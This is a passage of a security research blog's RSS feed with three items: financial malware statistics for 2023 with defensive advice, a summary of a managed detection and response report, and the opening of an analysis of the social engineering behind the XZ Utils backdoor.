  421. <p>TOP 20 countries by share of attacked users</p>
  422. <table width="100%">
  423. <tbody>
  424. <tr>
  425. <td width="70%"><strong>Country*</strong></td>
  426. <td width="30%"><strong>%**</strong></td>
  427. </tr>
  428. <tr>
  429. <td>Afghanistan</td>
  430. <td>6</td>
  431. </tr>
  432. <tr>
  433. <td>Turkmenistan</td>
  434. <td>5.2</td>
  435. </tr>
  436. <tr>
  437. <td>Tajikistan</td>
  438. <td>3.7</td>
  439. </tr>
  440. <tr>
  441. <td>China</td>
  442. <td>3.2</td>
  443. </tr>
  444. <tr>
  445. <td>Switzerland</td>
  446. <td>3</td>
  447. </tr>
  448. <tr>
  449. <td>Mauritania</td>
  450. <td>2.4</td>
  451. </tr>
  452. <tr>
  453. <td>Sudan</td>
  454. <td>2.3</td>
  455. </tr>
  456. <tr>
  457. <td>Egypt</td>
  458. <td>2.2</td>
  459. </tr>
  460. <tr>
  461. <td>Syria</td>
  462. <td>2.1</td>
  463. </tr>
  464. <tr>
  465. <td>Yemen</td>
  466. <td>2</td>
  467. </tr>
  468. <tr>
  469. <td>Paraguay</td>
  470. <td>2</td>
  471. </tr>
  472. <tr>
  473. <td>Algeria</td>
  474. <td>1.9</td>
  475. </tr>
  476. <tr>
  477. <td>Venezuela</td>
  478. <td>1.9</td>
  479. </tr>
  480. <tr>
  481. <td>Uzbekistan</td>
  482. <td>1.7</td>
  483. </tr>
  484. <tr>
  485. <td>Libya</td>
  486. <td>1.7</td>
  487. </tr>
  488. <tr>
  489. <td>Zimbabwe</td>
  490. <td>1.7</td>
  491. </tr>
  492. <tr>
  493. <td>Spain</td>
  494. <td>1.6</td>
  495. </tr>
  496. <tr>
  497. <td>Pakistan</td>
  498. <td>1.6</td>
  499. </tr>
  500. <tr>
  501. <td>Iraq</td>
  502. <td>1.6</td>
  503. </tr>
  504. <tr>
  505. <td>Thailand</td>
  506. <td>1.5</td>
  507. </tr>
  508. </tbody>
  509. </table>
  510. <p><em>* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.</em><br />
  511. <em>** Unique users whose computers were targeted by financial malware as a percentage of all Kaspersky users who encountered malware in the country.</em></p>
  512. <h3 id="types-of-attacked-users">Types of attacked users</h3>
  513. <p>Consumers (61.2%) were the main target of financial malware attacks in 2023, with their share unchanged from 2022.</p>
  514. <div class="js-infogram-embed" data-id="_/I7U0avE5vXj2GJDgfZvo" data-type="interactive" data-title="07 EN Financial report graphs" style="min-height:;"></div>
  515. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Financial malware attack distribution by type (corporate vs consumer), 2021–2022 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160107/07-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  516. <h2 id="mobile-malware">Mobile Malware</h2>
  517. <p>In 2023, 32% more Android users encountered mobile banking malware than in the previous year: 75,521 attacks compared to 57,219 in 2022. Moreover, we observed notable growth in the number of affected users in the last quarter of the year, which may be due to a new financial malware family called Mamont that targets mainly users in the CIS.</p>
  518. <div class="js-infogram-embed" data-id="_/2FFnOfY8x3bKX5CRjcW1" data-type="interactive" data-title="08 EN Financial report graphs" style="min-height:;"></div>
  519. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of Android users attacked by banking malware by month, 2022–2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160135/08-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  520. <p>The most active Trojan banker was Bian.h (22.22%), followed by Agent.eq (20.95%), whose share grew by 17.50 pp compared to 2022. Third was Faketoken.pac, which affected 5.33% of all users who encountered mobile financial threats in 2023.</p>
  521. <table width="100%">
  522. <tbody>
  523. <tr>
  524. <td width="40%"><strong>Verdict</strong></td>
  525. <td width="15%"><strong>%*, 2022</strong></td>
  526. <td width="15%"><strong>%*, 2023</strong></td>
  527. <td width="15%"><strong>Difference in pp</strong></td>
  528. <td width="15%"><strong>Change in ranking</strong></td>
  529. </tr>
  530. <tr>
  531. <td>Trojan-Banker.AndroidOS.Bian.h</td>
  532. <td>23.78</td>
  533. <td>22.22</td>
  534. <td>-1.56</td>
  535. <td>0</td>
  536. </tr>
  537. <tr>
  538. <td>Trojan-Banker.AndroidOS.Agent.eq</td>
  539. <td>3.46</td>
  540. <td>20.95</td>
  541. <td>+17.50</td>
  542. <td>+6</td>
  543. </tr>
  544. <tr>
  545. <td>Trojan-Banker.AndroidOS.Faketoken.pac</td>
  546. <td>6.42</td>
  547. <td>5.33</td>
  548. <td>-1.09</td>
  549. <td>+1</td>
  550. </tr>
  551. <tr>
  552. <td>Trojan-Banker.AndroidOS.Agent.cf</td>
  553. <td>1.16</td>
  554. <td>4.84</td>
  555. <td>+3.68</td>
  556. <td>+13</td>
  557. </tr>
  558. <tr>
  559. <td>Trojan-Banker.AndroidOS.Agent.ma</td>
  560. <td>0.00</td>
  561. <td>3.74</td>
  562. <td>+3.74</td>
  563. <td></td>
  564. </tr>
  565. <tr>
  566. <td>Trojan-Banker.AndroidOS.Agent.la</td>
  567. <td>0.04</td>
  568. <td>3.20</td>
  569. <td>+3.16</td>
  570. <td></td>
  571. </tr>
  572. <tr>
  573. <td>Trojan-Banker.AndroidOS.Anubis.ab</td>
  574. <td>0.00</td>
  575. <td>3.00</td>
  576. <td>+3.00</td>
  577. <td></td>
  578. </tr>
  579. <tr>
  580. <td>Trojan-Banker.AndroidOS.Agent.lv</td>
  581. <td>0.00</td>
  582. <td>1.81</td>
  583. <td>+1.81</td>
  584. <td></td>
  585. </tr>
  586. <tr>
  587. <td>Trojan-Banker.AndroidOS.Agent.ep</td>
  588. <td>4.17</td>
  589. <td>1.74</td>
  590. <td>-2.44</td>
  591. <td>-4</td>
  592. </tr>
  593. <tr>
  594. <td>Trojan-Banker.AndroidOS.Mamont.c</td>
  595. <td>0.00</td>
  596. <td>1.67</td>
  597. <td>+1.67</td>
  598. <td></td>
  599. </tr>
  600. </tbody>
  601. </table>
  602. <p><em>* Unique users who encountered this malware as a percentage of all Kaspersky mobile security users who encountered banking threats.</em></p>
  603. <h3 id="geography-of-the-attacked-mobile-users">Geography of the attacked mobile users</h3>
  604. <p>To find out which countries were worst affected by mobile financial malware in 2023, we calculated the percentage of users who encountered mobile banking Trojans among all active Kaspersky users in the country. Users in Turkey were attacked the most at 2.98%, with Saudi Arabia coming in second at 1.43% and Spain (1.38%) in third place.</p>
  605. <p>TOP 10 countries by number of users who encountered mobile banking malware, 2023:</p>
  606. <table width="100%">
  607. <tbody>
  608. <tr>
  609. <td width="70%"><strong>Country*</strong></td>
  610. <td width="30%"><strong>%**</strong></td>
  611. </tr>
  612. <tr>
  613. <td>Turkey</td>
  614. <td>2.98%</td>
  615. </tr>
  616. <tr>
  617. <td>Saudi Arabia</td>
  618. <td>1.43%</td>
  619. </tr>
  620. <tr>
  621. <td>Spain</td>
  622. <td>1.38%</td>
  623. </tr>
  624. <tr>
  625. <td>Switzerland</td>
  626. <td>1.28%</td>
  627. </tr>
  628. <tr>
  629. <td>India</td>
  630. <td>0.60%</td>
  631. </tr>
  632. <tr>
  633. <td>Japan</td>
  634. <td>0.52%</td>
  635. </tr>
  636. <tr>
  637. <td>Italy</td>
  638. <td>0.42%</td>
  639. </tr>
  640. <tr>
  641. <td>South Korea</td>
  642. <td>0.39%</td>
  643. </tr>
  644. <tr>
  645. <td>Azerbaijan</td>
  646. <td>0.24%</td>
  647. </tr>
  648. <tr>
  649. <td>Colombia</td>
  650. <td>0.24%</td>
  651. </tr>
  652. </tbody>
  653. </table>
  654. <p><em>* Countries and territories with relatively few (under 25,000) Kaspersky mobile security users have been excluded from the rankings.</em><br />
  655. <em>** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security users in the country.</em></p>
  656. <h2 id="conclusion">Conclusion</h2>
  657. <p>Although the number of users affected by PC banking malware continues to decline, there are other financial threats that underscore the need to stay vigilant and protect your digital assets. Unlike 2022, the year 2023 saw the number of users encountering mobile banking Trojans increase significantly. Cryptocurrency-related phishing and scams continued to grow, too, and they are not expected to stop in the near future.</p>
  658. <p>To protect your devices and finance-related accounts:</p>
  659. <ul>
  660. <li>Use secure authentication methods, such as multifactor authentication, strong unique passwords, and so on.</li>
  661. <li>Do not follow links from suspicious messages, and do not enter your credentials or payment details, unless you are 200% sure that the website is legitimate.</li>
  662. <li>Download apps only from trusted sources, such as official app marketplaces.</li>
  663. <li>Use reliable <a href="https://www.kaspersky.com/premium" target="_blank" rel="noopener">security solutions</a> capable of preventing both malware and phishing attacks.</li>
  664. </ul>
  665. <p>To protect your business:</p>
  666. <ul>
  667. <li>Regularly update your software and install security patches in a timely manner.</li>
  668. <li>Improve your employees&#8217; security awareness, conduct regular security training and encourage safe practices, such as proper account protection.</li>
  669. <li>Implement robust monitoring and endpoint security to detect and mitigate threats at an early stage.</li>
  670. <li>Implement network segmentation and default deny policies for users with access to financial assets.</li>
  671. <li>Stay aware of the latest cybercrime trends by obtaining threat intelligence from trusted sources and sharing it with industry partners.</li>
  672. </ul>
  673. ]]></content:encoded>
  674. <wfw:commentRss>https://securelist.com/financial-threat-report-2023/112526/feed/</wfw:commentRss>
  675. <slash:comments>0</slash:comments>
  676. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-scaled.jpg" width="2618" height="1527"><media:keywords>full</media:keywords></media:content>
  677. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-1024x597.jpg" width="1024" height="597"><media:keywords>large</media:keywords></media:content>
  678. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-300x175.jpg" width="300" height="175"><media:keywords>medium</media:keywords></media:content>
  679. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  680. </item>
  681. <item>
  682. <title>Managed Detection and Response in 2023</title>
  683. <link>https://securelist.com/kaspersky-mdr-report-2023/112411/</link>
  684. <comments>https://securelist.com/kaspersky-mdr-report-2023/112411/#respond</comments>
  685. <dc:creator><![CDATA[Kaspersky Security Services]]></dc:creator>
  686. <pubDate>Tue, 30 Apr 2024 09:00:40 +0000</pubDate>
  687. <category><![CDATA[SOC, TI and IR posts]]></category>
  688. <category><![CDATA[Industrial threats]]></category>
  689. <category><![CDATA[Internal Threats Statistics]]></category>
  690. <category><![CDATA[MDR]]></category>
  691. <category><![CDATA[Security services]]></category>
  692. <category><![CDATA[Security technology]]></category>
  693. <category><![CDATA[Targeted attacks]]></category>
  694. <category><![CDATA[Internal threats]]></category>
  695. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112411</guid>
  696.  
  697. <description><![CDATA[The report covers the tactics, techniques and tools most commonly deployed by threat actors, the nature of incidents detected and their distribution among MDR customers.]]></description>
  698. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03142303/Kaspersky_MDR_Report_Eng_2023_01.pdf" target="_blank" rel="noopener">Managed Detection and Response in 2023 (PDF)</a></p>
  699. <p>Alongside other security solutions, we provide Kaspersky Managed Detection and Response (MDR) to organizations worldwide, delivering expert monitoring and incident response 24/7. The task involves collecting telemetry for analysis by both machine-learning (ML) technologies and our dedicated Security Operations Center (SOC). On detection of a security incident, SOC puts forward a response plan, which, if approved by the customer, is actioned at the endpoint protection level. In addition, our experts give recommendations on organizing incident investigation and response.</p>
  700. <p>In the annual MDR report, we present the results of analysis of SOC-detected incidents, supplying answers to the following questions:</p>
  701. <ul>
  702. <li>Who are your potential attackers?</li>
  703. <li>How do they currently operate?</li>
  704. <li>How can their actions be detected?</li>
  705. </ul>
  706. <p>The report covers the tactics, techniques and tools most commonly used by threat actors, the nature of high-severity incidents and their distribution among MDR customers by geography and industry.</p>
  707. <h2 id="security-incident-statistics-for-2023">Security incident statistics for 2023</h2>
  708. <h3 id="security-events">Security events</h3>
  709. <p>In 2023, Kaspersky Managed Detection and Response handled more than 431,000 alerts about possible suspicious activity. Of these, more than 117,000 were analyzed by ML technologies, and over 314,000 by SOC analysts. Of the manually processed security events, slightly under 90% turned out to be false positives. What is more, around 32,000 security alerts were linked to approximately 14,000 incidents reported to MDR customers.</p>
  710. <h3 id="geographic-distribution-of-users">Geographic distribution of users</h3>
  711. <p>In 2023, the largest concentration of Kaspersky MDR customers was in the European region (38%). In second place came Russia and the CIS (28%), in third the Asia-Pacific region (16%).</p>
  712. <div id="attachment_112506" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112506" class="size-large wp-image-112506" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1024x508.jpeg" alt="Distribution of Kaspersky MDR customers by region, 2023" width="1024" height="508" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1024x508.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-300x149.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-768x381.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1536x762.jpeg 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-705x350.jpeg 705w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-740x367.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-564x280.jpeg 564w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-800x397.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01.jpeg 1640w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112506" class="wp-caption-text">Distribution of Kaspersky MDR customers by region, 2023</p></div>
  713. <h3 id="distribution-of-incidents-by-industry">Distribution of incidents by industry</h3>
  714. <p>Since the number of incidents largely depends on the scale of monitoring, the most objective picture is given by the distribution of the ratio of the number of incidents to the number of monitored endpoints. The diagram below shows the expected number of incidents of a given criticality per 10,000 endpoints, broken down by industry.</p>
  715. <div id="attachment_112507" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112507" class="size-large wp-image-112507" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-1024x683.jpeg" alt="Expected number of incidents of varying degrees of criticality per 10,000 endpoints in different industries, 2023" width="1024" height="683" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-1024x683.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-300x200.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-768x512.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-525x350.jpeg 525w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-740x494.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-420x280.jpeg 420w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-800x534.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02.jpeg 1181w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112507" class="wp-caption-text">Expected number of incidents of varying degrees of criticality per 10,000 endpoints in different industries, 2023</p></div>
  716. <p>In 2023, the most incidents per 10,000 devices were detected in mass media organizations, development companies and government agencies.</p>
  717. <p>In terms of absolute number of incidents detected, the largest number of incidents worldwide in 2023 was recorded in the financial sector (18.3%), industrial enterprises (16.9%) and government agencies (12.5%).</p>
  718. <div id="attachment_112508" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112508" class="size-large wp-image-112508" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-1024x524.jpeg" alt="Distribution of the number of Kaspersky MDR customers, all identified incidents and critical incidents by industry, 2023" width="1024" height="524" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-1024x524.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-300x153.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-768x393.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-685x350.jpeg 685w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-740x378.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-548x280.jpeg 548w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-800x409.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03.jpeg 1508w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112508" class="wp-caption-text">Distribution of the number of Kaspersky MDR customers, all identified incidents and critical incidents by industry, 2023</p></div>
  719. <h2 id="general-observations-and-recommendations">General observations and recommendations</h2>
  720. <p>Based on the analysis of incidents detected in 2023, and on our many years of experience, we can identify the following trends in security incidents and protection measures:</p>
  721. <ul>
  722. <li>Every year we identify targeted attacks carried out with direct human involvement. To effectively detect such attacks, besides conventional security monitoring, threat hunting is required.</li>
  723. <li>The effectiveness of the defense mechanisms deployed by enterprises is best measured by a range of offensive exercises. Year after year, we see rising interest in projects of this kind.</li>
  724. <li>In 2023, we identified fewer high-severity malware incidents than in previous years, but the number of incidents of medium and low criticality increased. The most effective approach to guarding against such incidents is through multi-layered protection.</li>
  725. <li>Leveraging the MITRE ATT&amp;CK<sup>®</sup> knowledge base supplies additional contextual information for attack detection and investigation teams. Even the most sophisticated attacks consist of simple steps and techniques, with detection of just a single step often uncovering the entire attack.</li>
  726. </ul>
  727. <p>Detailed information about attacker tactics, techniques and tools, incident detection and response statistics, and defense recommendations can be found in the <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03142303/Kaspersky_MDR_Report_Eng_2023_01.pdf" target="_blank" rel="noopener">full report (PDF)</a>.</p>
  728. ]]></content:encoded>
  729. <wfw:commentRss>https://securelist.com/kaspersky-mdr-report-2023/112411/feed/</wfw:commentRss>
  730. <slash:comments>0</slash:comments>
  731. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue.jpg" width="2449" height="1632"><media:keywords>full</media:keywords></media:content>
  732. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-1024x682.jpg" width="1024" height="682"><media:keywords>large</media:keywords></media:content>
  733. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-300x200.jpg" width="300" height="200"><media:keywords>medium</media:keywords></media:content>
  734. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  735. </item>
  736. <item>
  737. <title>Assessing the Y, and How, of the XZ Utils incident</title>
  738. <link>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/</link>
  739. <comments>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/#comments</comments>
  740. <dc:creator><![CDATA[GReAT]]></dc:creator>
  741. <pubDate>Wed, 24 Apr 2024 10:10:31 +0000</pubDate>
  742. <category><![CDATA[Incidents]]></category>
  743. <category><![CDATA[Linux]]></category>
  744. <category><![CDATA[Social engineering]]></category>
  745. <category><![CDATA[Supply-chain attack]]></category>
  746. <category><![CDATA[Targeted attacks]]></category>
  747. <category><![CDATA[XZ]]></category>
  748. <category><![CDATA[APT (Targeted attacks)]]></category>
  749. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112476</guid>
  750.  
  751. <description><![CDATA[In this article we analyze social engineering aspects of the XZ backdoor incident. Namely pressuring the XZ maintainer to pass on the project to Jia Cheong Tan, and then urging major downstream maintainers to commit the backdoored code to their projects.]]></description>
  752. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>High-end APT groups perform highly interesting social engineering campaigns in order to penetrate well-protected targets. For example, carefully constructed forum responses on precision-targeted accounts and follow-up &#8220;out-of-band&#8221; interactions regarding underground rail system simulator software helped deliver <a href="https://securelist.com/unraveling-the-lamberts-toolkit/77990/#green-lambert" target="_blank" rel="noopener">Green Lambert</a> implants in the Middle East. And, in what seems to be a learned approach, the <a href="https://tukaani.org/xz-backdoor/" target="_blank" rel="noopener">XZ Utils project penetration</a> was likely a patient, multi-year effort, planned in advance but somewhat clumsily executed.</p>
  753. <p>This recently exposed offensive effort slowly introduced a small cast of remote characters, communications, and malicious code to the more-than-decade-old open-source project XZ Utils and its maintainer, Lasse Collin. The backdoor code was inserted in February and March 2024, mostly by Jia Cheong Tan, likely a fictitious identity. The end goal was to covertly implement an exclusive-use backdoor in sshd by targeting the XZ Utils build process, and push the backdoored code to the major Linux distributions as part of a large-scale supply chain attack.</p>
  754. <p>While this highly targeted and interactive social engineering approach might not be completely novel, it is extraordinary. Also extraordinary is the stunningly subtle insertion of malicious code leveraging the build process in plain sight. This build process focus during a major supply chain attack is comparable only to the CozyDuke/DarkHalo/APT29/NOBELIUM <a href="https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/" target="_blank" rel="noopener">Solarwinds compromise</a> and the <a href="https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" target="_blank" rel="noopener">SUNSPOT</a> implant&#8217;s cunning and persistent presence – its monitoring capability for the execution of a Solarwinds build, and its malicious code insertion during any Solarwinds build execution. Only this time, it&#8217;s human involvement in the build process.</p>
  755. <p>It&#8217;s notable that one of the key differentiators of the Solarwinds incident from prior supply chain attacks was the adversary&#8217;s covert, prolonged access to the source/development environment. In this XZ Utils incident, this prolonged access was obtained via social engineering and extended with fictitious human identity interactions in plain sight.</p>
  756. <p>One of the best <a href="https://research.swtch.com/xz-timeline" target="_blank" rel="noopener">publicly available chronological timelines</a> on the social engineering side of the XZ Utils incident is posted by Russ Cox, currently a Google researcher. It&#8217;s highly recommended reading. Notably, Cox writes: &#8220;This post is a detailed timeline that I have constructed of the social engineering aspect of the attack, which appears to date back to late 2021.&#8221;</p>
  757. <h2 id="a-singaporean-guy-an-indian-guy-and-a-german-guy-walk-into-a-bar">A Singaporean guy, an Indian guy, and a German guy walk into a bar…</h2>
  758. <p>Three identities pressure XZ Utils creator and maintainer Lasse Collin in summer 2022 to provoke an open-source code project handover: Jia Tan/Jia Cheong Tan, Dennis Ens, and Jigar Kumar. These identities are made up of a GitHub account, three free email accounts with similar name schemes, an IRC and Ubuntu One account, email communications on XZ Utils <a href="https://www.mail-archive.com/xz-devel@tukaani.org/" target="_blank" rel="noopener">developer mailing lists</a> and downstream maintainers, and code. Their goal was to grant full access to XZ Utils source code to Jia Tan and subtly introduce malicious code into XZ Utils – the identities even interact with one another on mail threads, complaining about the need to replace Lasse Collin as the XZ Utils maintainer.</p>
759. <p>Note that the geographic dispersion of the fictitious identities is a bit forced here, perhaps to dispel hints of coordination: Singaporean or Malaysian (possibly of a Hokkien dialect), northern European, and Indian. Misspellings and grammar mistakes are similar across the three identities&#8217; communications. The &#8220;Jia Tan&#8221; identity seems a bit forced as well &#8211; the only public geolocation data is a <a href="https://boehs.org/node/everything-i-know-about-the-xz-backdoor#:~:text=I%20received%20an%20email%20that,and%20activity%20on%20March%2029th.&amp;text=Running%20a%20Nmap%20on%20the,feel%20like%20proximity%20becomes%20plausible." target="_blank" rel="noopener">Singaporean VPN exit node</a> that the identity may have used on March 29 to access the XZ Utils Libera IRC chat. Anyone constructing a fictitious Singaporean identity would plausibly select that particular exit node on purpose.</p>
  760. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112478" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png" alt="" width="911" height="337" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png 911w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-300x111.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-768x284.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-740x274.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-757x280.png 757w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-800x296.png 800w" sizes="(max-width: 911px) 100vw, 911px" /></a></p>
  761. <p>Our pDNS confirms this IP as a Witopia VPN exit. While we might expect a &#8220;jiat75&#8221; or &#8220;jiatan018&#8221; username for the &#8220;Jia Tan&#8221; Libera IRC account, this one in the screenshot above may have been used on March 29, 2024 by the &#8220;JiaT75&#8221; actor.</p>
  762. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112479" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1024x108.png" alt="" width="1024" height="108" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1024x108.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-300x32.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-768x81.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1536x162.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-740x78.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1600x169.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-800x85.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02.png 1647w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
763. <p>One additional identity, Hans Jansen, <a href="https://github.com/tukaani-project/xz/pull/53" target="_blank" rel="noopener">introduced</a> a June 2023 performance optimization into the XZ Utils source, committed by Collin, and later leveraged by JiaT75&#8217;s backdoor code. Jia Tan gleefully accepted the proposed IFUNC additions: &#8220;Thanks for the PR and the helpful links! Overall this seems like a nice improvement to our function-picking strategy for CRC64. It will likely be useful when we implement CRC32 CLMUL too :)&#8221;.</p>
